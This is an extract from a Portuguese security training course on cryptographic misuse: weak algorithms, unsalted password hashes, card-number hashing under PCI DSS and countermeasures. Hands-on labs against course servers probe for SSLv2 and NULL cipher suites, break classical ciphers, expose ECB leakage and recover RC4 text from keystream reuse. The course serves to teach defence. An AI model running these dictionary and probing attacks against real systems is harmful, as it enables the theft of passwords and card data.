6. Todos os nmeros de carto so recuperados pelo usurio malicioso, combinando o

fluxo de chaves obtido no passo anterior com cada texto cifrado da base de dados.
Uso de primitiva inadequada

O caso clssico de uso de primitiva criptogrfica inadequada para satisfazer um requisito q
de segurana ocorreu no episdio envolvendo a comunicao cifrada entre Mary, rainha
dos escoceses, e os comparsas que buscavam assassinar a rainha Elizabeth (Singh, 1999).
Todas as mensagens trocadas entre eles eram transportadas por um agente duplo, que as
entregava, tambm, para Sir Walsingham, responsvel pela segurana da rainha. Um dos
empregados dele, Thomas Phelippes, era um dos melhores criptoanalistas da Europa e deci-
frava cada mensagem recebida de seu chefe, relativa conspirao supracitada.
Uma delas, enviada por Babbington, propunha levar adiante o plano de assassinato da
rainha, para libertar Mary e torn-la a nova monarca da Inglaterra. Ao saber disso, Walsin-
gham esperou uma resposta de Mary, para poder incrimin-la, e adicionou ao final da carta
um texto forjado, solicitando os nomes das seis pessoas que executariam o plano. Sem a
menor ideia de que o texto no era autntico, Babbington forneceu os nomes das pessoas
em nova carta cifrada, a qual permitiu captur-los e conden-los morte.
O grande erro, do ponto de vista de criptografia, foi a ignorncia de que cifras no q

satisfazem o requisito de autenticidade da origem da mensagem! Outro exemplo de uso
incorreto de primitiva criptogrfica dado por Menezes et al. (2001). Imagine-se que
Alice e Beto trocam mensagens, usando um formato particular, no qual os primeiros bits
representam uma quantia de dinheiro. Para evitar que um usurio malicioso obtenha ou
altere a mensagem original, eles empregam uma cifra de fluxo, com chaves descartveis.
Um atacante que consiga alterar as informaes em trnsito pode, simplesmente, mudar
os primeiros bits de cada mensagem, adulterando o valor monetrio informado.
450
Embora isto no permita saber o valor original, possibilita quebrar o requisito de integridade
que se esperava satisfazer com a soluo. Novamente, o problema resulta de uma premissa
incorreta quanto ao uso de uma cifra.
Mistura de algoritmos com nveis de segurana diferentes

A analogia da corrente se encaixa perfeitamente no escopo de solues que empregam
diversos mecanismos criptogrficos de diferentes classes.
Assim como a resistncia da corrente dada pela fora do elo mais fraco, a segurana q
de mecanismos que envolvem criptografia determinada pelo algoritmo menos robusto
que utilizado. Portanto, ao combinar diferentes algoritmos, importante selecion-los
dentre aqueles que apresentam a mesma fora. A partir desse requisito, natural ques-
tionar como se deve medir o nvel de segurana de um criptossistema qualquer. A maneira
mais direta leva em considerao o custo do melhor ataque conhecido; se para execut-lo,
so necessrias 2n operaes, dito que o algoritmo fornece n bits de segurana.
Diversos trabalhos da literatura fornecem recomendaes sobre os tamanhos de chave que

devem ser utilizados, de acordo com o nvel de segurana desejado. Dentre eles, os mais
importantes so os artigos e relatrios tcnicos de Lenstra e Verheul (1999), Smart (2010)
e Barker et al. (2007). Este ltimo mais genrico e trata, alm do tema desta seo, de
todos os aspectos de gerenciamento de chaves criptogrficas. A Tabela 16 abaixo apresenta
exemplos de algoritmos e comprimentos de chave para alguns nveis comuns de segurana.
Recomenda-se que ela seja utilizada como ponto de partida, para avaliar se uma dada
soluo est aderente s melhores prticas de seleo de algoritmos criptogrficos.
Para exemplificar, considere-se uma aplicao que proteja o transporte de chaves com
RSA-3072, que cifre as informaes dos bancos de dados com Triple-DES com duas chaves
(2-TDES) e que proteja a integridade de dados com SHA-512. O nvel de segurana de cada
algoritmo , respectivamente, 128, 80 e 256 bits. Portanto, a sute adotada de mecanismos
Figura 9.59
Nvel de segurana fornece apenas 80 bits de segurana, o que est na margem do poder computacional exis-
de diversos algo- tente atualmente. Para elevar substancialmente a fora do conjunto, bastaria substituir o
ritmos criptogr-
2-TDES para o AES-128, que passaria a ser o elo mais fraco, juntamente com o RSA-3072.
ficos, em funo
do tamanho da
chave (Barker et
A Figura 9.59 abaixo apresenta exemplos de algoritmos e comprimentos de chave para q
al., 2007). alguns nveis comuns de segurana.
Algoritmos assimtricos
Funes de hash
Nvel de Cifras
Fatorao de Logaritmo Logaritmo criptogrficas
segurana simtricas
inteiros discreto discreto (tamanho do hash)
elptico
80 2-TDES RSA-1024 DH-1024 ECDSA-160 RIPEMD-160

112 3-TDES RSA-2048 DH-2048 ECDSA-224 SHA-224
128 AES-128 RSA-3072 DH-3072 ECDSA-256 SHA-256
451
Ataque a algoritmos
Que algoritmo mais difcil de ser atacado: AES com chave de 128 bits ou RSA com chave
de 1024 bits?
Uso de algoritmos criptogrficos com fraquezas conhecidas

Quais seriam os motivos de uma pessoa utilizar um carro cujos freios estivessem que-
brados? Ignorncia do fato ou total irresponsabilidade, mas, em qualquer dos casos, gera-se
uma situao de insegurana para ela e para outras pessoas.
Este cenrio uma analogia ao emprego de mecanismos criptogrficos com fraquezas q

conhecidas, o que deve ser totalmente evitado para que a segurana da informao no
seja comprometida.
No obstante, ainda hoje, encontram-se diversas aplicaes que no respeitam essa pre-
missa bsica e pem em risco as informaes que manipulam.
Exemplos de algoritmos que no devem ser mais utilizados atualmente incluem: q

1 Data Encryption Standard (DES).
1 RSA com chaves menores que 1024 bits.
1 MD5.
1 SHA-1.
Data Encryption Standard (DES)

Em 1998, um grupo de pesquisadores da Electronic Frontier Foundation elaborou uma
mquina contendo 1536 chips de propsito especfico, para varrer todo o espao de chaves
de 56 bits do algoritmo. O custo para implementao foi de US$250.000,00 e o tempo
mdio original para quebra de uma mensagem protegida por DES era de 4,5 dias. A prova
de conceito consistiu na soluo de um desafio apresentado pelo criptlogo Matt Blaze, cujo
objetivo era ser resolvido nica e exclusivamente por fora bruta.
RSA com chaves menores que 1024 bits

O recorde atual de fatorao de mdulos RSA pertence a Kleinjung et al. (2010), que foi
capaz de solucionar o desafio de 768 bits da antiga lista dos laboratrios RSA. Esse resul-
tado serviu para corroborar as estimativas de avano computacional e espera-se que, nos
prximos anos, mdulos de 1024 bits, que oferecem apenas 80 bits de segurana, possam
tambm ser fatorados. Por esse motivo, chaves menores que 1024 bits no devem mais ser
empregadas e uma migrao para tamanhos maiores desejvel.
MD5
O algoritmo teve a propriedade de resistncia a colises quebrada em 2004 por um time
de pesquisadores chineses (Wang e Yu, 2005). Desde ento, foi possvel gerar colises para
arquivos postscript, PDF e executveis e, pior ainda, forjar um certificado vlido para uma
autoridade certificadora intermediria (Stevens, 2009). Este poderoso ataque permite emitir
certificados de chave pblica fraudulentos para pessoas e servidores, viabilizando ataques
de personificao perfeitos.
452
SHA-1
Embora o algoritmo ainda no tenha sido efetivamente quebrado, teve a segurana terica de
80 bits reduzida para apenas 69 bits (Wang, Yin e Yu, 2005). Pouco tempo depois, outro time,
liderado tambm por Wang, descreveu um ataque mais rpido, capaz de gerar uma coliso
em 263 passos (Wang, Yao e Yao, 2005). Por essas razes, recomendvel migrar para a famlia
SHA-2 ou outra funo de hash criptogrfica que no possua nenhuma fraqueza conhecida.
Proteo de senhas de usurios

Normalmente, para proteger senhas de usurios, os sistemas armazenam apenas os q
hashes delas, confiando na propriedade de resistncia da pr-imagem da funo cripto-
grfica utilizada.
Relembrando o conceito, isso determina que, para essencialmente todos os valores hash Y,
deve ser computacionalmente infactvel encontrar um valor X, tal que h(X) = Y. No presente
contexto, isso significa que, se um atacante obtiver um arquivo de hashes, ele no deve ser
capaz de recuperar as senhas originais, para autenticar-se no sistema.
A segurana deste mecanismo, porm, depende de algumas premissas que nem sempre q
so satisfeitas. A primeira fraqueza resulta da qualidade das senhas escolhidas pelos
usurios, que, comumente, empregam palavras da lngua ou informaes pessoais.
Neste cenrio, um atacante no precisa se preocupar em quebrar a funo de hash crip-
togrfica. Muito mais fcil montar um dicionrio de palavras conhecidas e variaes e
pr-computar os respectivos hashes.
Assim, a partir de um arquivo de hashes de senhas obtido de uma aplicao vulnervel,

basta consultar se o hash de cada entrada est presente no dicionrio construdo. Em caso
positivo, a palavra correspondente ao hash coincidente pode ser utilizada como senha.
A vantagem deste ataque que o dicionrio pode ser construdo uma nica vez e utilizado
indefinidas vezes.
Para impedir que isso acontea, comum o emprego de salts, que so bits aleatrios q
adicionados ao final de cada senha, antes do clculo do hash.
Como uma pequena alterao em uma entrada faz com que o hash correspondente sofra
uma grande variao, um nico bit de salt inviabiliza que o dicionrio inclua apenas os
hashes das palavras selecionadas, calculados sem o bit adicional (vide Figura 9.60). Note-se
que, para cada bit de salt, o dicionrio deve dobrar de tamanho e, assim, quanto mais bits
forem utilizados, melhor.
santana 97dc75...
+ bit 0 c432da...
Figura 9.60 santana
Uso de salt
em senhas. + bit 1 34df32...
O segundo pecado na proteo de senhas uma variante do problema j exposto, a qual q

no envolve a escolha de uma senha fraca por parte do usurio. Esta vulnerabilidade ocorre
quando um sistema utiliza hashes criptogrficos para proteo de senhas pertencentes a
um domnio de baixa cardinalidade, isto , o nmero de senhas possveis pequeno.
453
Um exemplo disso so senhas bancrias de quatro dgitos numricos, que totalizam apenas
10 mil possibilidades, e podem ser quebradas da seguinte maneira, se hashes forem utili-
zados para proteg-las:
1. O atacante obtm o arquivo contendo os pares (usurio, senha) e, pelo tamanho do hash,
seleciona algumas funes candidatas.
2. Para cada uma das funes candidatas, ele gera uma tabela contendo senha e valor hash,
para todas as dez mil senhas possveis.
3. O usurio malicioso cruza, ento, o arquivo de senhas com as diversas tabelas, por meio
do campo hash, e a correta ser aquela que possuir todos os valores.
Proteo de dados de cartes de pagamento

O requisito 3.4 do padro PCI DSS (PCI, 2009a) demanda que nmeros de cartes de q
pagamento (PANs) sejam protegidos, durante o armazenamento, por meio de mtodos PAN
seguros. Tcnicas aceitas incluem o truncamento do nmero, o uso de funes de hash Primary Account
Number corresponde
criptogrficas, substituio por tokens e emprego de cifras simtricas.
ao nmero de 14 a 19
dgitos que identifica
A partir da verso 2.0 do padro, passaram a incluir, acertadamente, a ressalva de que
cartes de crdito e de
proibido armazenar concomitantemente partes do nmero de carto em claro e os hashes dbito.
dos nmeros inteiros. De fato, quando isto no respeitado, ataques similares queles
contra senhas podem ser realizados. Mas ser que suficiente seguir esta recomendao,
em termos de segurana? Como veremos, no , e o padro continua falho, no aspecto de
proteo de dados armazenados (Kost, 2007).
q
Algoritmo de Luhn
Um nmero de carto de crdito ou dbito possui de 15 a 16 dgitos, considerando-se Algoritmo utilizado
as bandeiras Visa, Mastecard, American Express, JCB e Discover, que fazem parte do para validar nmeros
de cartes de crdito
conselho PCI. Os seis primeiros dgitos do nmero correspondem ao BIN, responsvel
e de dbito, alm
pela identificao do banco, e o ltimo utilizado como dgito verificador. Considerando de outros nmeros
que a quantidade de bancos em um nico pas no extensa e que a grande maioria de identificao. Foi
criado pelo cientista
das compras realizada com cartes de residentes, o conjunto de BINs aplicveis
da computao Hans
razoavelmente pequeno. Adicionando o fato de que o nmero de carto deve satisfazer Peter Luhn, quando
ao Algoritmo de Luhn, que restringe o dgito verificador para um nico valor por PAN, trabalhava na IBM.
o total de dgitos que devem ser descobertos para um BIN arbitrrio de no mximo
nove. Desse modo, um ataque bem-sucedido contra um nico BIN deve ser capaz de
pr-calcular 1 bilho de hashes, o que est ao alcance de computadores comuns.
Por exemplo, em um Intel Core 2 Duo de 2,4 GHz, o OpenSSL capaz de calcular, aproxima-
damente, 2 milhes de hashes de nmeros de carto por segundo, utilizando-se blocos de
16 bytes. A Figura 9.61 ilustra o tempo em horas necessrio para montar, com o proces-
sador mencionado, um dicionrio que mapeie hashes para nmeros de carto, dependendo
do nmero de dgitos conhecidos. Para o caso de um BIN fixo, a tarefa pode ser executada
em meros 8,4 minutos. No pior cenrio, quando os 6 primeiros e os 4 ltimos dgitos so
armazenados em claro juntamente com o hash do nmero inteiro de carto, quase nenhum
tempo necessrio para executar o ataque.
454
Contramedidas
Um armazenamento seguro de informaes requer a seleo adequada de criptossistemas, q
o gerenciamento das chaves criptogrficas utilizadas e o zelo adequado com a manipulao
de chaves pelos programas (Howard et al., 2005; Meucci et al., 2008). Desse modo:
1 Classifique as informaes e cifre aquelas que necessitam que o requisito de sigilo

seja satisfeito.
1 Se no for necessrio, no armazene dados sensveis, aps serem processados,

evitando, assim, ter de proteg-los. Um exemplo disso um sistema de pagamento ele-
trnico, que necessita do nmero de carto, somente at a transao passar pelo pro-
cesso de autorizao; aps isso, ele pode, geralmente, ser descartado (PCI, 2009a,b).
1 No crie seus prprios algoritmos e protocolos criptogrficos, pois, mesmo quando

escritos por criptlogos de primeira linha, eventualmente, eles apresentam vulnerabi-
lidades (Knudsen, 2005; Pramstaller et al., 2005).
1 Nunca empregue cifras clssicas para proteger informaes sensveis e lembre-se

sempre de que BASE64 no um algoritmo criptogrfico.
1 No utilize algoritmos criptogrficos com fraquezas conhecidas, como DES, MD5 (Wang
e Yu, 2005) e SHA-1 (Wang, Yin e Yu, 2005). Embora este ltimo ainda no tenha sido
completamente quebrado, j teve a segurana terica reduzida consideravelmente.
1 Quando cifras de bloco forem utilizadas, empregue modos de operao adequados a

cada situao.
1 Use algoritmos criptogrficos para satisfazerem apenas os requisitos de segurana da

informao para os quais foram criados.
1 Quando uma soluo empregar diversos algoritmos criptogrficos, determine o nvel

mnimo desejado de segurana e adote somente criptossistemas que atendam ao
limiar escolhido.
1 Muito cuidado ao proteger informaes pertencentes a domnios de baixa cardina-

lidade, pois ataques de dicionrios podem ser facilitados, dependendo da soluo
adotada.
1 No proteja nmeros de carto de crdito e dbito com funes de hash criptogrficas,

apesar de aceitas para esse propsito pelo PCI DSS (PCI, 2009a). Em vez disso, utilize
cifras simtricas e realize a gesto adequada das chaves criptogrficas empregadas.
1 Crie e utilize processos e procedimentos para gerenciamento de chaves

criptogrficas, para que estas sejam protegidas durante todo o ciclo de vida, que vai
da criao destruio (Menezes et al., 2001; PCI, 2009a,b).
1 Utilize bons geradores de nmeros pseudo-aleatrios para a criao de chaves. Por-

tanto, nunca use para esse propsito funes como rand() da linguagem C.
455
1 Considere empregar hardware seguro, para realizar as operaes criptogrficas e q
armazenar as chaves relacionadas, quando os dados protegidos forem extrema-
mente sensveis. Parta da mxima de que o software no pode proteger a si prprio
(Howard et al., 2005).
1 Se no for possvel proteger chaves por meio de hardware seguro, utilize protocolos
de partilha de segredos com vrios custodiantes.
1 Nunca embuta chaves criptogrficas e senhas no cdigo do programa, pois so

facilmente recuperveis. Dependendo de como estiverem, basta um comando para
realizar a tarefa.
1 Limpe a memria alocada para chaves criptogrficas antes de liber-la para o sistema
operacional.
1 Marque as pginas de memria, contendo chaves criptogrficas, como inelegveis

para swap.
456
Atividade 1 Vulnerabilidades no transporte de informaes
Esta atividade compreende os testes para deteco de vulnerabilidades no transporte de
informaes. Para inici-la, carregue as mquinas virtuais do aluno e do servidor (Fedora) e
execute os roteiros na primeira delas.
Teste de SSLv2
O teste mais rpido para verificar se um servidor aceita a verso 2.0 do protocolo SSL por
meio da ferramenta OpenSSL:
2. Digite o comando abaixo para testar o servidor exemplo.esr.rnp.br:
~$ openssl s_client ssl2 connect exemplo.esr.rnp.br:443
3. Se a sesso for estabelecida sem erro, o servidor suporta SSLv2.
4. Pressione Ctrl-C para encerrar a conexo com o servidor.
Teste das sutes criptogrficas suportadas pelo servidor SSL/TLS

Nesta parte sero exercitados trs mtodos diferentes para deteco das sutes criptogr-
ficas suportadas por um servidor.
OpenSSL
A opo do OpenSSL que testa se uma determinada sute suportada -cipher:
2. Digite o seguinte comando para verificar se o servidor exemplo.esr.rnp.br suporta a sute

NULL-SHA:
~$ openssl s_client -cipher NULL-SHA -connect exemplo.esr.rnp.br:443
3. Se a sesso for estabelecida sem erro, o servidor suporta a sute vulnervel.
4. Pressione Ctrl-C para encerrar a conexo com o servidor.

THCSSLCheck
Como o THCSSLCheck compilado para plataformas Windows, necessrio utilizar o aplica-

tivo Wine para execut-lo em sistemas Linux:
6. Inicie o THCSSLCheck a partir do menu Aplicativos\Curso Ferramentas.
7. Execute o comando:
C:\> thcsslcheck exemplo.esr.rnp.br 443
457
8. Role a janela e analise o relatrio gerado. Quais sutes fracas so suportadas?
SSL Scan
Um ponto interessante do SSL Scan que ele exibe, para cada verso de protocolo, as sutes
criptogrficas utilizadas por padro pelo servidor sendo testado:
11. Digite o seguinte comando, para avaliar o servidor exemplo.esr.rnp.br:
~$ sslscan exemplo.esr.rnp.br
12. Role a janela e analise o relatrio gerado. Quais as diferenas para a sada do THCSSLCheck?
Prova de conceito de trfego TLS em claro
Este exerccio ilustra que possvel fazer com que os protocolos SSL e TLS no cifrem os
dados que protegem. O roteiro abaixo consiste em um autoataque, mas isso no impor-
tante por se tratar de uma prova de conceito.

senha ser solicitada. Digite esruser e clique em OK.
2. Clique no primeiro cone da barra de ferramentas, para listar as interfaces de rede dispo-
nveis para captura. Na caixa de dilogo que aparece, clique em Options da linha eth1.
No campo Capture filter, digite tcp port https e clique em Start para iniciar a captura
de pacotes.
4. Conecte-se ao servidor web exemplo.esr.rnp.br, com o OpenSSL:
~$ openssl s_client -connect exemplo.esr.rnp.br:443
5. Digite a requisio abaixo, finalizando-a com [Enter] duas vezes:
GET / HTTP/1.0

7. Procure pela primeira linha contendo TLSv1 e Application Data e a selecione.
8. Na regio central da tela do Wireshark, selecione a linha Secure Socket Layer.
9. Examine o contedo na parte inferior e veja que ele est cifrado.
10. Inicie nova captura no Wireshark, clicando no terceiro boto da barra de ferramentas
(Start new live capture).
11. Clique em Continue without saving, na caixa de dilogo que aparece.
458
12. Na janela de terminal, digite:
~$ openssl s_client -cipher NULL-SHA -connect exemplo.esr.rnp.br:443
13. Repita os Passos 5 a 8 acima, mas, em vez da primeira, procure pela ltima linha, no
Passo 7. Veja que o contedo agora est em claro, apesar de encapsulado por TLS.
14. Encerre o Wireshark e o terminal.
Certificado invlido
O propsito desta atividade verificar uma das situaes em que o navegador impossibili-
tado de realizar a negociao SSL/TLS com o servidor, devido a um problema no certificado:
2. Acesse https://exemplo.esr.rnp.br.
3. Uma mensagem de erro exibida, informando que no possvel estabelecer uma

conexo segura. Clique em Technical Details e verifique o motivo do problema.
Recursos sensveis protegidos por HTTPS e HTTP

Informaes sensveis fornecidas por meio de HTTPS nunca devem ser disponibilizadas
tambm por HTTP simples, pois o usurio pode ser induzido a acessar a verso desprote-
gida da pgina, que pode ser facilmente capturada em trnsito.
2. Acesse https://w3s.esr.rnp.br e observe que a pgina protegida por HTTPS.
3. Tente, agora, acessar o mesmo endereo pelo protocolo HTTP e observe o que acontece.
Neste caso, o servidor est configurado para redirecionar o usurio para a pgina prote-
gida, evitando que informaes sejam expostas a pessoas no autorizadas.
Atividade 2 Vulnerabilidades no armazenamento de informaes

O objetivo desta atividade capacitar o aluno em tcnicas bsicas de criptoanlise, para
que seja capaz de recuperar informaes sensveis, protegidas por cifras fracas ou por
criptossistemas utilizados incorretamente. Todos os exerccios desta atividade necessitam
da mquina virtual do aluno e de arquivos contidos na pasta /home/esruser/Arquivos do
Curso/sessao-09.
Dados protegidos com BASE64

Conforme explicado, BASE64 simplesmente um esquema de codificao e, por isso, no

pode ser utilizado na proteo do sigilo de informaes. Siga o roteiro abaixo para entender
como fcil recuperar a mensagem original a partir de um texto codificado em BASE64.
2. Visualize o contedo do arquivo arquivo.b64:
~$ cat arquivo.b64
459
3. Decodifique o arquivo com o comando:
~$ base64 -d arquivo.b64
Observe que no necessrio fornecer qualquer segredo para recuperar a mensagem original.
4. Visualize o contedo do arquivo arquivo2.b64:
~$ cat arquivo2.b64
5. Decodifique o arquivo com o comando:
~$ base64 -d arquivo2.b64 > arquivo2.txt
6. Visualize o arquivo gerado:
~$ cat arquivo2.txt
O arquivo resultante no est legvel e, aparentemente, est protegido por uma cifra de
substituio simples, que ser criptoanalisada em atividade posterior.
ndice de coincidncia
O ndice de coincidncia uma ferramenta que auxilia o processo de criptoanlise, ao
indicar o tipo de cifra utilizada e o provvel idioma da mensagem original. A ltima parte,
porm, requer uma mensagem suficientemente longa, que seja vlida estatisticamente.
2. Verifique o ndice de coincidncia do arquivo em claro ingles.txt:
~$ ioc ingles.txt
3. Calcule o ndice de coincidncia do arquivo ingles.enc, resultante do ciframento de

ingles.txt, por um algoritmo de substituio simples:
~$ ioc ingles.enc
4. Observe que os ndices do arquivo em claro e do cifrado so praticamente idnticos, o

que coerente com o fato de que cifras monoalfabticas apenas transferem as frequn-
cias individuais dos smbolos para outros.
5. Verifique o ndice de coincidncia do arquivo em claro portugues2.txt:
~$ ioc portugues2.txt
6. Calcule o ndice de coincidncia do arquivo portugues2.poli.enc, resultante do cifra-

mento de portugues2.txt, por um algoritmo de substituio polialfabtica:
~$ ioc portugues2.poli.enc
Note que o ndice de coincidncia bem menor que o apresentado por textos em linguagem
natural, conforme esperado.
460
Quebra da cifra de Cesar
A cifra de Cesar, assim como a codificao em BASE64, uma transformao fixa, que no
utiliza uma chave. Por esse motivo, muito fcil quebr-la e recuperar o texto legvel.
2. Visualize o contedo do arquivo cesar.enc:
~$ cat cesar.enc
3. Calcule o ndice de coincidncia do arquivo:
~$ ioc cesar.enc
Observe que o valor encontrado indica corretamente que o texto est protegido por uma
cifra monoalfabtica ou de transposio.
4. Aplique a transformao de deciframento da cifra de Cesar:
~$ rotix -f cesar.enc -o cesar.plain -r 3 -L
5. Visualize o contedo do arquivo cesar.plain e veja que texto legvel foi recuperado:
~$ cat cesar.plain
6. Suponha que o arquivo arquivo2.txt, gerado no exerccio sobre BASE64, esteja prote-
gido com Cesar. Tente decifr-lo por meio do comando:
~$ rotix -f arquivo2.txt -o arquivo2.plain -r 3 -L
7. Visualize o contedo do arquivo arquivo2.plain e veja que texto legvel foi recuperado:
~$ cat arquivo2.plain
Quebra da cifra de deslocamento

O grande problema da cifra de deslocamento que o espao de chaves utilizado contm
apenas 26 elementos, que podem ser testados exaustivamente at que o texto original seja
encontrado. Tendo isso em mente, aplique a tcnica ao arquivo deslocamento.enc:
2. Visualize o contedo de deslocamento.enc:
~$ cat deslocamento.enc
3. Calcule o ndice de coincidncia e observe a classe provvel de cifra utilizada:

~$ ioc deslocamento.enc
Este um exemplo de que uma classe incorreta de cifra pode ser identificada, quando o
texto cifrado for muito pequeno.
4. Tente realizar o deciframento com a chave k = 1 e veja se texto em claro recuperado:
~$ rotix -f deslocamento.enc -r 1 -L
5. Repita o passo anterior, variando k de 2 a 25 (opo -r), at que texto legvel seja obtido.
461
Quebra de ROT13
ROT13 outro exemplo de transformao fixa, baseada em uma especializao da cifra de
deslocamento, com chave k = 13. A recuperao de texto protegido por este mecanismo
trivial, conforme ilustrado pela presente atividade:
2. Visualize o contedo do arquivo rot13.enc:
~$ cat rot13.enc
3. Calcule o ndice de coincidncia do arquivo:
~$ ioc rot13.enc
4. Aplique a transformao descrita pelo algoritmo ROT13:
~$ rotix -f rot13.enc
Quebra da cifra de substituio simples

Uma cifra de substituio simples pode ser quebrada, como visto, por meio da tcnica de
anlise de frequncias, introduzida por al-Kind. Aplique este mtodo para criptoanalisar o
arquivo portugues3.mono.enc, utilizando as ferramentas fornecidas pelo stio web The
Black Chamber, de Simon Singh:
2. Acesse http://www.simonsingh.net/The_Black_Chamber/frequencypuzzle.htm.
4. Calcule o ndice de coincidncia para o arquivo portugues3.mono.enc:
~$ ioc portugues3.mono.enc
Observe que tanto a cifra quanto o idioma foram corretamente identificados.
5. Abra o arquivo portugues3.mono.enc:
~$ gedit portugues3.mono.enc &
6. Selecione todo o texto (Ctrl-A) e o copie para a rea de transferncia (Ctrl-C).
7. Retorne ao Firefox e cole o texto cifrado no campo Ciphertext.
8. Clique no boto Frequency of Individual Letters.
9. Veja no histograma quais so, ordenadamente, as trs letras mais frequentes.

10. Substitua, em ordem, as trs letras mais comuns na lngua portuguesa por aquelas
encontradas no passo anterior. Para isso, preencha os campos correspondentes em
Plaintext Alphabet.
11. Procure no campo Plaintext agrupamentos de letras que possam ser identificadas como
palavras. Para cada uma que encontrar, veja que mapeamentos podem ser inferidos entre
letras do texto em claro e do texto cifrado e efetue a substituio em Plaintext Alphabet.
12. Repita o Passo 11 at que o texto inteiro seja recuperado.
13. Encerre o Firefox e janela de terminal.
462
Quebra da cifra de Vigenre
Nesta atividade, um texto cifrado com Vigenre ser criptoanalisado pelo mtodo de
Babbage, com o auxlio de ferramentas do stio web The Black Chamber, de Simon Singh:
1. Inicie o Internet Explorer, na mquina real.
2. Acesse http://www.simonsingh.net/The_Black_Chamber/cracking_tool.html.
3. Limpe a caixa de texto da tela inicial.
5. Abra o arquivo portugues2.poli.enc:
~$ gedit portugues2.poli.enc &
6. Selecione todo o texto (Ctrl-A) e o copie para a rea de transferncia (Ctrl-C).
7. Retorne ao Internet Explorer e cole o texto cifrado na caixa de texto.
8. Clique em Find Repeated Sequences.
9. Role a tela, observe a coluna que possui o maior nmero de linhas marcadas com X e
clique no cabealho correspondente.
10. V ao final da pgina e clique no boto L1, para analisar a cifra monoalfabtica definida
para a primeira posio de cada bloco.
11. Clicando nas setas para a direita ou para a esquerda, alinhe o histograma em vermelho
com o da Figura 9.62 e observe que o texto no campo lateral muda automaticamente
para refletir o novo mapeamento. Oriente-se pelos picos das letras A, E e O e pelo
vale formado pelas quatro ltimas letras.
Figura 9.62 12. Repita o processo para os botes L*.

Frequncias das
letras em portugus. 13. Encerre o Internet Explorer, a janela de terminal e o gedit.
Uso de modo de operao inadequado

Vimos que o uso do modo ECB, para mensagens maiores que o tamanho do bloco da cifra
utilizada, revela informaes sobre o texto em claro. Como exemplo, a presente atividade
visa ilustrar esta vulnerabilidade no contexto de proteo de imagens:
463
2. Visualize com o gimp a imagem figura.bmp:
~$ gimp figura.bmp &
3. Retorne janela de terminal.
4. Cifre a imagem figura.bmp com o algoritmo AES-128 em modo ECB:
~$ openssl enc -aes-128-ecb -in figura.bmp -out figura.bmp.ecb8
-K 01234567890123456789012345678901 -iv 0
5. Cifre a imagem figura.bmp com o algoritmo AES-128 em modo CBC:
~$ openssl enc -aes-128-cbc -in figura.bmp -out figura.bmp.cbc8
-K 01234567890123456789012345678901 -iv 0
6. Liste os arquivos do diretrio e observe que o tamanho dos arquivos cifrados maior
que o original em alguns bytes:
~$ ls -l
Isso se deve ao processo de padding, que consiste em se preencher a mensagem para que o
tamanho dela fique mltiplo daquele definido pelo bloco da cifra utilizada.
7. Compacte com o gzip o arquivo figura.bmp.ecb:
~$ gzip -c figura.bmp.ecb > figura.bmp.ecb.gz
8. Compacte com o gzip o arquivo figura.bmp.cbc:
~$ gzip -c figura.bmp.cbc > figura.bmp.cbc.gz
9. Liste os arquivos do diretrio novamente:
~$ ls -l
Note que, enquanto no houve compresso do arquivo cifrado em modo CBC, a con-
traparte em modo ECB teve o tamanho reduzido para apenas 3,7% do original. Isto
indica a presena de muita redundncia no arquivo, o que no se espera da sada de
uma cifra utilizada corretamente.
10. Tente abrir o arquivo cifrado em modo ECB com o gimp:
~$ gimp figura.bmp.ecb &
Uma mensagem de erro indicando formato de arquivo desconhecido exibida, pois o

ciframento transforma toda a informao, inclusive o cabealho da imagem. Clique em
OK para encerr-la.
11. Como o formato BMP descreve um mapa de bits, copiando o cabealho da imagem
original para os arquivos cifrados, possvel visualiz-los e observe as mudanas que
ocorreram em cada bit, no processo de ciframento:
~$ ./bmphc figura.bmp figura.bmp.ecb
~$ ./bmphc figura.bmp figura.bmp.cbc
464
12. Visualize o arquivo figura.bmp.ecb:
~$ gimp figura.bmp.ecb &
Observe que a imagem do arquivo original preservada, mas com cores diferentes.
13. Retorne janela de terminal.
14. Visualize o arquivo figura.bmp.cbc e note que a imagem no possui relao nenhuma
com a figura original:
~$ gimp figura.bmp.cbc &
15. Encerre o gimp e a janela de terminal.
Uso incorreto de algoritmo criptogrfico

O RC4 pertence classe de cifras de fluxo aditivas e binrias e, portanto, no deve nunca ser
usado para cifrar textos diferentes com a mesma chave. Este exerccio ilustrar um ataque
de texto em claro conhecido, que possvel quando essa restrio no satisfeita:
2. Visualize os contedos dos arquivos 1.txt, 2.txt e 3.txt:
~$ cat 1.txt; echo
~$ cat 2.txt; echo
~$ cat 3.txt; echo
3. Cifre os arquivos 1.txt, 2.txt e 3.txt com o algoritmo RC4:
~$ openssl enc -rc4-40 -in 1.txt -out 1.enc -K 0123456789
4. Analise os textos cifrados resultantes, comparando-os com os respectivos textos em claro:
~$ hexdump 1.txt 1.enc
5. Considere que o atacante tenha acesso somente aos arquivos cifrados, mas que conhece
o texto em claro correspondente ao primeiro deles, isto , o contedo de 1.txt. Calcu-
lando o XOR byte a byte entre este arquivo e o 1.enc, obtm-se o fluxo de chaves gerado
pelo RC4, que no varia quando uma chave fixa empregada. Isso pode ser executado
por meio do comando abaixo, que grava o resultado no arquivo ks.bin:
~$ fxor 1.enc 1.txt ks.bin
6. Visualize o fluxo de chaves:
~$ hexdump ks.bin
465
7. O conhecimento do fluxo de chaves gerado implica que irrelevante saber a chave espe-
cfica que foi utilizada no ciframento, pois, calculando o XOR byte a byte entre o primeiro
e qualquer texto protegido por ele, obtm-se o texto legvel correspondente:
~$ fxor 2.enc ks.bin 2.plain
~$ fxor 3.enc ks.bin 3.plain
8. Visualize os contedos dos arquivos 2.plain e 3.plain e veja que correspondem aos
textos em claro originais, presentes nos arquivos 2.txt e 3.txt, respectivamente:
~$ cat 2.plain; echo
~$ cat 3.plain; echo
Nvel de segurana dos algoritmos criptogrficos

Indique o nvel de segurana em bits das combinaes de algoritmos abaixo enumeradas:
1. 2-TDES, RSA-3072, RIPEMD-160.
2. AES-128, RSA-1024, SHA-512.
3. AES-192, RSA-2048, SHA-256.
4. AES-256, ECDSA-512, SHA-512.
Proteo inadequada de dados de domnio de pequena cardinalidade

O propsito desta atividade constatar a velocidade com que possvel gerar um dicionrio
de hashes para senhas numricas pequenas:
2. Digite o comando abaixo para gerar um dicionrio para nmeros de seis dgitos:
~$ dictbuilder 6 list.txt
3. Abra o dicionrio gerado com o gedit:
~$ gedit list.txt
4. Veja o tamanho em MBytes do arquivo gerado:
~$ du -m list.txt
5. Encerre a janela de terminal e o gedit.

466
Bibliografia 9
